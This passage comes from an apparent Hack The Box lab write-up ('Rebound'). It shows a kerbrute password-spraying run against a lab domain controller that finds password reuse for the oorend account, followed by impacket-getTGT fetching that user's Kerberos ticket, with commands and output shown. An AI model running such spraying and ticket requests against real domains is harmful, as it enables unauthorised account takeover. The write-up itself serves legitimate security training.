Password Spraying
Using the password of the ldap_monitor account, I will additionally perform a password spraying attack to check for password reuse
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ kerbrute passwordspray --dc dc01.rebound.htb -d REBOUND.HTB users.txt '1GR8t@$$4u'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 09/11/23 - Ronnie Flathers @ropnop
2023/09/11 09:07:22 > Using KDC(s):
2023/09/11 09:07:22 > dc01.rebound.htb:88
2023/09/11 09:07:22 > [+] VALID LOGIN: ldap_monitor@REBOUND.HTB:1GR8t@$$4u
2023/09/11 09:07:22 > [+] VALID LOGIN: oorend@REBOUND.HTB:1GR8t@$$4u
2023/09/11 09:07:22 > Done! Tested 17 logins (2 successes) in 0.169 secondsPassword reuse confirmed for the oorend user
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-getTGT rebound.htb/oorend@dc01.rebound.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Password: 1GR8t@$$4u
[*] Saving ticket in oorend@dc01.rebound.htb.ccacheConfirmed